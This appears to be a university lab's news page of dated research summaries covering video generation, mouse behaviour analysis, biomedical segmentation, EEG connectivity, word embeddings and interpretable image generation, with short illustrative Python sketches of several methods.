News

MCL Research on Robust Machine Learning

Autoregressive video diffusion models can generate high-quality frames in real time, but are limited to short clips — push them further, and the KV cache silently discards past context, causing identity drift and quality collapse. We introduce MemRoPE, a training-free framework that solves this with two co-designed mechanisms: Memory Tokens compress evicted frames into evolving dual-rate EMA representations, while Online RoPE Indexing stores keys without positional encoding and applies it dynamically at attention time, keeping temporal aggregation mathematically valid. The result is unbounded video generation with a fixed-size cache — we demonstrate continuous one-hour generation that preserves subject identity and visual fidelity throughout.
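As a rough illustration of the Memory Token idea, the sketch below maintains fast- and slow-decay EMA summaries of evicted frame features, so memory stays fixed-size no matter how long generation runs. The decay rates, pooling, and class names are illustrative assumptions, not MemRoPE's actual implementation.

```python
import numpy as np

class DualRateMemory:
    """Fixed-size memory for evicted KV-cache frames.

    Illustrative sketch only: decay rates, pooling, and names are
    assumptions, not the MemRoPE implementation.
    """
    def __init__(self, dim, fast=0.7, slow=0.99):
        self.fast_tok = np.zeros(dim)   # tracks recent context
        self.slow_tok = np.zeros(dim)   # tracks long-horizon identity
        self.fast, self.slow = fast, slow

    def evict(self, frame_feat):
        """Fold a pooled feature of the frame leaving the cache into both EMAs."""
        self.fast_tok = self.fast * self.fast_tok + (1 - self.fast) * frame_feat
        self.slow_tok = self.slow * self.slow_tok + (1 - self.slow) * frame_feat

    def tokens(self):
        # memory stays (2, dim) no matter how many frames were evicted
        return np.stack([self.fast_tok, self.slow_tok])

mem = DualRateMemory(dim=4)
for t in range(100):
    mem.evict(np.full(4, float(t)))
print(mem.tokens().shape)  # (2, 4)
```

The fast token follows recent frames closely while the slow token changes gradually, which is what lets a dual-rate scheme keep both short-term detail and long-term identity in a bounded budget.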

By |April 26th, 2026|News|Comments Off on MCL Research on Robust Machine Learning|

MCL Research on Mouse Motion Behavior

Animal motion behavior offers a window into how the brain organizes memory, decision-making, and goal-directed action. In our research, we study mouse navigation behavior using the Morris Water Maze (MWM), a widely used behavioral paradigm for investigating spatial learning and memory in rodents. While conventional measures such as escape latency and path length provide useful summaries of performance, they often fail to capture the rich and dynamic nature of movement during navigation.

Our research focuses on understanding mouse motion behavior at a finer temporal scale. Instead of treating each trial as a single behavioral unit, we examine how navigation strategies evolve within a trial, since mice may shift among exploration, wall-following, scanning, circling, and more direct platform-oriented movement over time. These within-trial changes can offer deeper insight into learning processes, behavioral flexibility, and group differences that may be overlooked by aggregate metrics alone.

To support this goal, we develop an interpretable and lightweight computational framework for analyzing tracked trajectories from behavioral videos. Our approach analyzes motion continuously over time and identifies sub-trajectory-level navigational states. The pipeline first corrects for tracking irregularities through uniform resampling and smoothing, then derives geometry- and kinematics-based descriptors such as curvature, displacement, turning behavior, and target alignment. These features are mapped to human-readable behavioral categories through a hierarchical rule-based inference process, followed by temporal refinement to reduce fragmented or implausible label switching.
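The descriptor stage can be illustrated with a minimal sketch that derives speed, turning, curvature, and target alignment from a uniformly resampled trajectory. The exact feature definitions and any thresholds here are assumptions, not the published pipeline.

```python
import numpy as np

def motion_descriptors(xy, target):
    """Geometry/kinematics descriptors for a tracked trajectory.

    Illustrative sketch of the feature types described in the text.
    xy: (N, 2) uniformly resampled positions; target: (2,) platform location.
    """
    v = np.diff(xy, axis=0)                      # step displacement vectors
    speed = np.linalg.norm(v, axis=1)
    heading = np.arctan2(v[:, 1], v[:, 0])
    turn = np.diff(np.unwrap(heading))           # signed turning angle per step
    # curvature ~ turning angle per unit arc length
    curvature = turn / np.maximum(speed[1:], 1e-9)
    # alignment of motion with the direction toward the target (1 = straight at it)
    to_target = target - xy[:-1]
    to_target /= np.maximum(np.linalg.norm(to_target, axis=1, keepdims=True), 1e-9)
    align = np.sum(v / np.maximum(speed[:, None], 1e-9) * to_target, axis=1)
    return {"speed": speed, "turn": turn, "curvature": curvature, "align": align}

# a straight run toward the target gives alignment close to 1 and zero turning
path = np.stack([np.linspace(0, 1, 20), np.zeros(20)], axis=1)
feats = motion_descriptors(path, target=np.array([2.0, 0.0]))
print(feats["align"].mean())  # 1.0
```

Rule-based labels (e.g., "direct", "circling", "wall-following") can then be read off from ranges of these point-wise descriptors before temporal smoothing.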

This work emphasizes interpretability and practical usability in neuroscience research. By providing point-wise annotations and visually verifiable outputs, the framework enables behavioral phenotyping and hypothesis-driven analysis of strategy transitions and learning dynamics.

By |April 19th, 2026|News|Comments Off on MCL Research on Mouse Motion Behavior|

MCL Research on Microscopic Blood Vessel Segmentation

Our recent research in volumetric biomedical image segmentation for blood vessels has focused on improving both segmentation accuracy and computational efficiency, particularly for high-resolution microscopy data. Architectures such as 3D U-Net have become a widely adopted standard due to their ability to model hierarchical spatial features in three-dimensional volumes. Over time, more advanced variants have achieved higher performance; however, these improvements are often accompanied by significantly increased parameter counts and computational cost, making them less practical for large-scale or resource-constrained applications. 

This trade-off is especially pronounced in high-resolution 3D microscopy imaging, where the input volumes are large and memory-intensive. Tasks such as vascular segmentation are inherently challenging, as blood vessels are thin, low-contrast, and structurally complex, with varying orientations. Capturing such characteristics in three dimensions is therefore important, but significantly more difficult than in 2D settings, especially for resource-efficient models. In addition, suitable datasets are limited in availability. High-quality volumetric microscopy data is difficult and expensive to acquire, even for mouse brains and more so for humans. Annotation requires significant expert effort, especially when a single brain slice contains over 50 million pixels and a whole brain comprises thousands of slices. As a result, our study relies on a private dataset consisting of a single small annotated block from one brain sample, as no public datasets are currently available. While this allows detailed analysis of complex biological structures, it leaves us with a small dataset and few labeled samples, a problem we aim to address with 3D-GUSL.

To address these constraints, 3D-GUSL adopts a feed-forward U-shaped design that avoids backpropagation while preserving multi-scale spatial information. The pipeline operates hierarchically across resolution levels, where local 3D neighborhoods are first transformed into structured feature [...]

By |April 12th, 2026|News|Comments Off on MCL Research on Microscopic Blood Vessel Segmentation|

MCL Research Presented at WACV 2026

MCL members Jintang Xue and Kevin Yang presented their papers at the Winter Conference on Applications of Computer Vision (WACV) 2026 in Tucson, AZ, USA.

The title of Jintang et al.’s paper is “Descrip3D: Enhancing Large Language Model-based 3D Scene Understanding with Object-Level Text Descriptions”. Here is a brief summary:

“Understanding 3D scenes goes beyond simply recognizing objects; it requires reasoning about the spatial and semantic relationships between them. Current 3D scene-language models often struggle with this relational understanding, particularly when visual embeddings alone do not adequately convey the roles and interactions of objects. In this paper, we introduce Descrip3D, a novel and powerful framework that explicitly encodes the relationships between objects using natural language. Unlike previous methods that rely only on 2D and 3D embeddings, Descrip3D enhances each object with a textual description that captures both its intrinsic attributes and contextual relationships. These relational cues are incorporated into the model through a dual-level integration: embedding fusion and prompt-level injection. This allows for unified reasoning across various tasks such as grounding, captioning, and question answering, all without the need for task-specific heads or additional supervision. When evaluated on five benchmark datasets, including ScanRefer, Multi3DRefer, ScanQA, SQA3D, and Scan2Cap, Descrip3D consistently outperforms strong baseline models, demonstrating the effectiveness of language-guided relational representation for understanding complex indoor scenes.”

Kevin’s paper is entitled “SVD-Det: A Lightweight Framework for Video Forgery Detection Using Semantic and Visual Defect Cues”, co-authored with Tianyu Zhang, Feng Qian, Bing Yan, and C.-C. Jay Kuo. The summary goes as follows:

“With the rapid proliferation of AI-generated content (AIGC) on multimedia platforms, efficient and reliable video forgery detection has become increasingly important. Existing approaches often rely on either visual artifacts or semantic inconsistencies, but suffer from high computational costs, [...]

By |April 5th, 2026|News|Comments Off on MCL Research Presented at WACV 2026|

MCL Research on Medical Image Classification

We propose the development of a high-efficiency foundation model tailored for the MedMNIST v2 benchmark, utilizing a novel architecture based on Multi-Resolution Tree-Structured Vector Quantization (TSVQ). While current foundation models often rely on computationally expensive transformers, our approach focuses on a hierarchical quantization strategy. By employing multi-resolution codebooks, we can effectively capture and represent both long-range structural dependencies and intricate, short-range local correlations inherent in diverse medical imaging modalities, from pathology slides to radiological scans.

The core innovation lies in the tree-structured organization of the latent space. Unlike flat codebooks used in traditional VQ-VAEs, TSVQ offers a logarithmic search complexity, significantly reducing the energy required for both training and inference. This alignment with “Green Learning” principles ensures that our model achieves state-of-the-art representation fidelity without the massive carbon footprint typically associated with large-scale AI. By optimizing the codebook search and minimizing redundant parameters, we aim to demonstrate that high-performance medical AI can be both sustainable and accessible on modest hardware.
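A minimal sketch of tree-structured VQ makes the logarithmic search concrete: encoding descends the tree with O(depth) distance checks instead of scanning every leaf of a flat codebook. The recursive 2-means split and all parameters below are simplifications, not the paper's training procedure.

```python
import numpy as np

def build_tsvq(data, depth, rng):
    """Fit a binary tree-structured VQ codebook via recursive 2-means (sketch)."""
    node = {"centroid": data.mean(axis=0)}
    if depth == 0 or len(data) < 2:
        return node
    c = data[rng.choice(len(data), 2, replace=False)].astype(float)
    for _ in range(10):
        lab = np.argmin(((data[:, None, :] - c[None, :, :]) ** 2).sum(-1), axis=1)
        if not (np.any(lab == 0) and np.any(lab == 1)):
            return node  # degenerate split: keep this node as a leaf
        c = np.stack([data[lab == k].mean(axis=0) for k in range(2)])
    node["children"] = [build_tsvq(data[lab == k], depth - 1, rng) for k in range(2)]
    return node

def encode(node, x):
    """Descend the tree: O(depth) comparisons vs O(2**depth) for a flat codebook."""
    path = []
    while "children" in node:
        d = [np.sum((x - ch["centroid"]) ** 2) for ch in node["children"]]
        k = int(np.argmin(d))
        path.append(k)
        node = node["children"][k]
    return path, node["centroid"]

rng = np.random.default_rng(0)
data = rng.normal(size=(500, 8))
tree = build_tsvq(data, depth=4, rng=rng)
bits, centroid = encode(tree, data[0])
print(len(bits), centroid.shape)
```

At depth 4 the encoder performs at most 8 distance evaluations (2 per level) rather than 16, and the gap widens exponentially with codebook size, which is the source of the energy savings discussed above.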

This framework serves as a robust, domain-agnostic foundation. The learned representations are designed to be highly transferable, enabling the model to excel across a spectrum of downstream tasks. Crucially, this architecture addresses the “small data” problem in clinical medicine; by pre-training on the comprehensive MedMNIST suite, the model can be fine-tuned on smaller, domain-specific clinical datasets with superior accuracy and stability. Ultimately, we aim to expand this green learning paradigm to broader healthcare applications, empowering the medical community with scalable, low-power, and high-precision diagnostic tools.

By |March 29th, 2026|News|Comments Off on MCL Research on Medical Image Classification|

MCL Research on Green Image Generation

Although generative adversarial networks (GANs) and diffusion models achieve impressive realism through neural networks and backpropagation, the learned representations and latent spaces lack clear attribution and interpretability. Understanding the generation process requires auxiliary probing or post-hoc analysis. Empirical studies suggest that some models implicitly follow a coarse-to-fine generation mechanism, in which early stages determine the global structure and layout, and later stages progressively refine details and inject texture and style. This work explicitly formalizes this mechanism and presents a feed-forward image generation (FIG) process with well-defined objectives at each stage. FIG statistically models the lowest-resolution images and then progressively refines them. Unlike neural generative models, FIG provides explicit interpretability and attribution. Each generated region can be traced to its associated source and refinement. This property facilitates controllability, supports privacy-aware generation without retraining, and allows transparent manipulation of generated content. Compared to representative baselines based on GAN and diffusion, FIG achieves competitive visual quality, offers superior interpretability, and improves robustness in data-sparse regimes.

We introduced FIG, an interpretable and fully feed-forward image generation framework that formalizes the separation between global structure modeling and local detail refinement. FIG records pixel-level attribution throughout multi-resolution enhancement, enabling each synthesized detail to be attributed, controlled, or selectively modified. This design permits control over the global appearance, semantic attributes, and localized regions without affecting the rest of the image. Furthermore, the transparent retrieval process supports source-aware filtering, allowing selective exclusion of sensitive training samples without retraining. Extensive benchmark results demonstrate that FIG maintains competitive generation quality while offering these interpretability and controllability benefits.
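To illustrate attribution during coarse-to-fine refinement, the toy sketch below upsamples a low-resolution image and records, for each 2x2 output block, which bank patch supplied the added detail. The nearest-patch retrieval rule is an invented stand-in for FIG's statistical modeling; only the attribution bookkeeping is the point here.

```python
import numpy as np

def refine_with_attribution(img_lr, patch_bank):
    """One coarse-to-fine refinement step with per-region attribution (toy sketch).

    img_lr: (H, W) low-res image; patch_bank: (K, 2, 2) detail patches.
    Returns the 2x-upsampled image and, per output 2x2 block, the index
    of the source patch, so every synthesized region is traceable.
    """
    H, W = img_lr.shape
    out = np.kron(img_lr, np.ones((2, 2)))        # naive 2x upsampling
    attrib = np.zeros((H, W), dtype=int)
    means = patch_bank.reshape(len(patch_bank), -1).mean(axis=1)
    for i in range(H):
        for j in range(W):
            # retrieve the detail patch whose mean best matches this pixel
            k = int(np.argmin(np.abs(means - img_lr[i, j])))
            # inject zero-mean detail so the coarse structure is preserved
            out[2*i:2*i+2, 2*j:2*j+2] += patch_bank[k] - patch_bank[k].mean()
            attrib[i, j] = k                       # record the source
    return out, attrib

rng = np.random.default_rng(1)
bank = rng.normal(size=(8, 2, 2))
lr = rng.normal(size=(4, 4))
hr, attrib = refine_with_attribution(lr, bank)
print(hr.shape, attrib.shape)  # (8, 8) (4, 4)
```

Because the injected detail is zero-mean, each output block keeps the coarse value it refines, and excluding a sensitive source amounts to masking its index out of the retrieval step, with no retraining.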

By |March 22nd, 2026|News|Comments Off on MCL Research on Green Image Generation|

MCL Research on EEG Data Analysis

Our work starts with a simple idea: the way different brain regions communicate can reveal a lot about what the brain is doing. Instead of treating EEG as a collection of separate channels, we view it as a network and study the connectivity patterns between regions. This kind of representation is useful because different brain states often produce different connectivity structures. In other words, brain connectivity maps can provide a more intuitive and informative picture of neural activity than raw signals alone.

In one of our studies, we use the direct Directed Transfer Function (dDTF) to build these maps. A key advantage of dDTF is that it captures not only whether two brain regions are related, but also the direction of information flow between them. This makes it a good tool for describing dynamic interactions in the brain. Connectivity patterns, in particular, differ clearly across mental workload conditions. As illustrated in Fig. 2, low and high workload states already present visibly different connectivity maps across several frequency bands, suggesting that they contain meaningful information for distinguishing cognitive states.

Based on this observation, we developed the framework shown in Fig. 1. We first decompose the EEG signals into multiple frequency bands and construct a connectivity map for each band. These multiband maps are then combined into a unified feature representation. From there, we progressively refine the features, selecting the most informative ones and transforming them into a more discriminative space before making the final prediction. In this way, our method leverages interpretable brain connectivity patterns while keeping the overall learning pipeline efficient, practical, and easy to extend to other EEG analysis tasks.
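The multiband pipeline can be sketched as follows. Plain correlation stands in here for dDTF, which is directional and requires fitting a multivariate autoregressive model; the band edges and the FFT-mask bandpass are also illustrative simplifications.

```python
import numpy as np

BANDS = {"theta": (4, 8), "alpha": (8, 13), "beta": (13, 30)}  # Hz; edges illustrative

def bandpass(eeg, fs, lo, hi):
    # simple FFT-mask bandpass; a stand-in for a proper filter design
    F = np.fft.rfft(eeg, axis=1)
    freqs = np.fft.rfftfreq(eeg.shape[1], d=1.0 / fs)
    F[:, (freqs < lo) | (freqs >= hi)] = 0
    return np.fft.irfft(F, n=eeg.shape[1], axis=1)

def band_connectivity(eeg, fs):
    """Decompose into bands, build a connectivity map per band,
    and concatenate into one feature vector. eeg: (channels, samples)."""
    feats = []
    for lo, hi in BANDS.values():
        conn = np.corrcoef(bandpass(eeg, fs, lo, hi))  # (C, C) connectivity map
        iu = np.triu_indices_from(conn, k=1)           # symmetric: keep upper triangle
        feats.append(conn[iu])
    return np.concatenate(feats)                       # unified multiband features

rng = np.random.default_rng(0)
x = rng.normal(size=(8, 2 * 256))                      # 8 channels, 2 s at 256 Hz
f = band_connectivity(x, fs=256)
print(f.shape)  # (84,) = 3 bands x C(8,2)
```

In the actual framework, a feature-selection and transformation stage would follow before classification; the point of the sketch is the map-per-band-then-concatenate structure.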

By |March 15th, 2026|News|Comments Off on MCL Research on EEG Data Analysis|

MCL Research on Variable-Length Word Embeddings

We propose Variable-Length Word Embeddings, a POS-aware and compute-efficient Word2Vec training framework. Traditional embeddings assign the same dimensionality to every token, even though different parts of speech contribute very differently to sentence meaning. In real text, nouns usually carry the main semantic content, verbs encode actions and relations, while many other categories (e.g., articles, prepositions, conjunctions) are comparatively low-information. This motivates a representation strategy that spends more capacity on important words and less capacity on the rest.

Our core idea is to use POS tags to organize training data and allocate embedding dimensions accordingly. We first POS-tag the entire corpus and split it into three views: a noun-only corpus, a noun+verb corpus, and a full corpus containing all tokens. Instead of training one uniform embedding space, we build embeddings in stages so that nouns become the backbone, verbs are learned relative to that backbone, and the remaining words are learned with minimal capacity.

We train nouns progressively with increasing dimensionality. Specifically, we learn noun embeddings at 50D, 100D, and 200D on the noun-only corpus. To make training across dimensions stable and efficient, each higher-dimensional model is initialized from the previous lower-dimensional embeddings using Lanczos interpolation (50D → 100D, and 100D → 200D), and then refined on the noun-only corpus. This produces high-capacity noun representations while preserving continuity across stages.
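The dimension-growing initialization can be sketched with a small 1D Lanczos resampler that stretches a 50D vector to 100D. The kernel size a=3, the border clamping, and the weight normalization are assumptions, not necessarily the settings used in our experiments.

```python
import numpy as np

def lanczos_resize(vec, out_dim, a=3):
    """Resample a 1D embedding vector to a new dimensionality with a
    Lanczos kernel, as in the 50D -> 100D -> 200D initialization stages.
    Sketch only: kernel size and normalization are assumptions.
    """
    n = len(vec)
    # map each output index to a continuous position in the input
    pos = (np.arange(out_dim) + 0.5) * n / out_dim - 0.5
    out = np.zeros(out_dim)
    for i, p in enumerate(pos):
        lo = int(np.floor(p)) - a + 1
        ks = np.arange(lo, lo + 2 * a)               # 2a taps around p
        x = p - ks
        w = np.sinc(x) * np.sinc(x / a)              # Lanczos window
        w[np.abs(x) >= a] = 0.0
        ks = np.clip(ks, 0, n - 1)                   # clamp at the borders
        out[i] = np.sum(w * vec[ks]) / np.sum(w)     # normalized interpolation
    return out

v50 = np.random.default_rng(0).normal(size=50)
v100 = lanczos_resize(v50, 100)   # initialize the 100D model from the 50D one
print(v100.shape)  # (100,)
```

The resized vectors only seed the higher-dimensional model; training on the noun-only corpus then refines them, which is what preserves continuity across stages.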

After obtaining the noun backbone at each dimension, we introduce verbs through a controlled adaptation step. Using the noun+verb corpus, we train verbs on top of the noun space, where noun vectors are soft-frozen (implemented with a reduced update factor) so they remain stable but can still adjust slightly. Verbs, in contrast, are fully trainable and learn to align with noun semantics. We apply this procedure at 50D [...]

By |March 8th, 2026|News|Comments Off on MCL Research on Variable-Length Word Embeddings|

MCL Research on Renal Image Segmentation

AI-driven medical imaging has emerged as a transformative force in modern healthcare, empowering clinicians to deliver more accurate, efficient, and personalized diagnostic and therapeutic strategies. By automatically analyzing CT, MRI, ultrasound, and other imaging modalities, AI systems can identify subtle patterns, precisely segment anatomical structures, and support clinical decision-making with enhanced accuracy and consistency. These advancements not only improve diagnostic performance but also streamline clinical workflows and ultimately elevate the overall quality of patient care.

Among the many tasks in medical image analysis, kidney and kidney tumor segmentation are pivotal for the management of renal diseases, particularly renal cell carcinoma. Precise delineation of kidneys and tumors is essential for quantitative tumor assessment, treatment planning, surgical navigation, postoperative monitoring, and radiomics research. Accurate segmentation enables clinicians to reliably estimate tumor burden, evaluate tumor–organ spatial relationships, and facilitate nephron-sparing surgical strategies, all of which directly influence patient outcomes. Given that manual segmentation is labor-intensive and prone to inter- and intra-observer variability, the development of automated, robust, and reliable segmentation methods has become increasingly critical for both routine clinical practice and large-scale research.

To address these limitations, we propose 3D-Cube Multi-Stage Green U-shaped Learning (GUSL), a novel multi-stage feed-forward machine learning framework for 3D medical image segmentation without backpropagation. GUSL is designed to be computationally efficient, interpretable, and environmentally sustainable, while maintaining competitive segmentation performance.

The proposed framework adopts a cascaded multi-stage segmentation strategy tailored to different anatomical tasks. As illustrated in Figure 1, distinct stages are designed for coarse-to-fine segmentation. First, the original CT volume is downsampled to a lower resolution, enabling efficient coarse localization of the kidney with reduced computational complexity. This low-resolution stage provides an approximate spatial position of the kidney, as highlighted in the red box. [...]
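The low-resolution localization stage can be sketched as follows. A fixed intensity threshold stands in for the learned GUSL prediction, and the downsampling factor and all parameters are illustrative.

```python
import numpy as np

def coarse_localize(volume, factor=4, thresh=0.5):
    """Stage-1 sketch: downsample a CT volume by block averaging and return
    an approximate bounding box of the bright region in original coordinates.
    A threshold stands in for the learned kidney prediction here.
    volume: (D, H, W) float array.
    """
    d, h, w = (s // factor * factor for s in volume.shape)
    v = volume[:d, :h, :w].reshape(d // factor, factor,
                                   h // factor, factor,
                                   w // factor, factor).mean(axis=(1, 3, 5))
    idx = np.argwhere(v > thresh)                # low-res voxels flagged as kidney
    lo, hi = idx.min(axis=0), idx.max(axis=0) + 1
    # map the low-res box back to original-resolution coordinates
    return lo * factor, hi * factor

vol = np.zeros((32, 32, 32))
vol[8:16, 8:16, 8:16] = 1.0                      # synthetic bright region
lo, hi = coarse_localize(vol)
print(lo, hi)  # [8 8 8] [16 16 16]
```

The returned box would then crop the full-resolution volume for the fine segmentation stages, which is what keeps the expensive computation confined to a small region.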

By |March 1st, 2026|News|Comments Off on MCL Research on Renal Image Segmentation|

MCL Research on Renal Imaging Analysis

Our paper proposes a multi-stage Green U-shaped Learning (GUSL) framework for efficient and reliable IHC image quantification. As shown in the overall pipeline (Stage I–III), the system starts with the preprocessing of the input IHC image using normalization and PCA. In Stage I, marker-specific GUSL modules learn mpIF-informed intermediate representations, such as LAP2 and KI67-related cues, from co-registered training data. In Stage II, these representations are integrated by a dedicated GUSL module to generate a cell/background segmentation map in a coarse-to-fine and residual refinement manner. In Stage III, connected cell regions are extracted, and cell-level classification is performed to determine whether each cell is biomarker-positive or biomarker-negative. The entire framework follows a feedforward, modular design without end-to-end backpropagation, reducing computational cost while keeping the system transparent and interpretable.
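Stage III can be sketched with a small connected-component pass over the Stage-II cell/background map, followed by a per-cell call. The mean-intensity positivity rule and the 0.5 threshold are illustrative stand-ins for the actual cell-level classifier.

```python
import numpy as np
from collections import deque

def extract_cells(seg, intensity, pos_thresh=0.5):
    """Stage-III sketch: 4-connected component labeling on the binary
    segmentation map, then a per-cell positive/negative decision.
    seg: (H, W) bool; intensity: (H, W) marker signal in [0, 1].
    """
    H, W = seg.shape
    labels = np.zeros((H, W), dtype=int)
    cells, cur = [], 0
    for i in range(H):
        for j in range(W):
            if seg[i, j] and labels[i, j] == 0:
                cur += 1                          # start a new cell region
                labels[i, j] = cur
                q, pix = deque([(i, j)]), []
                while q:                          # BFS flood fill
                    y, x = q.popleft()
                    pix.append((y, x))
                    for dy, dx in ((1, 0), (-1, 0), (0, 1), (0, -1)):
                        ny, nx = y + dy, x + dx
                        if (0 <= ny < H and 0 <= nx < W
                                and seg[ny, nx] and labels[ny, nx] == 0):
                            labels[ny, nx] = cur
                            q.append((ny, nx))
                mean = float(np.mean([intensity[p] for p in pix]))
                cells.append({"id": cur, "size": len(pix),
                              "positive": mean > pos_thresh})
    return labels, cells

seg = np.zeros((6, 6), dtype=bool)
seg[0:2, 0:2] = True                 # cell 1
seg[4:6, 3:6] = True                 # cell 2
inten = np.where(seg, 0.9, 0.0)
inten[0:2, 0:2] = 0.1                # cell 1 is biomarker-negative
labels, cells = extract_cells(seg, inten)
print([(c["id"], c["positive"]) for c in cells])  # [(1, False), (2, True)]
```

Counting the positive entries then yields the biomarker-positive fraction that the quantification reports.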

Qualitative examples are shown in the second figure. Column (a) presents the input brightfield IHC images. Column (b) shows the ground-truth cell segmentation and biomarker labels. Columns (c) and (d) compare results from a representative deep learning baseline and our GUSL method. We observe that the proposed method produces clearer cell boundaries and more consistent positive/negative classification, especially in crowded regions and low-contrast areas. These visual results are consistent with our quantitative evaluation, which demonstrates competitive segmentation accuracy and improved quantification agreement, while using much lower model complexity and energy consumption.

By |February 22nd, 2026|News|Comments Off on MCL Research on Renal Imaging Analysis|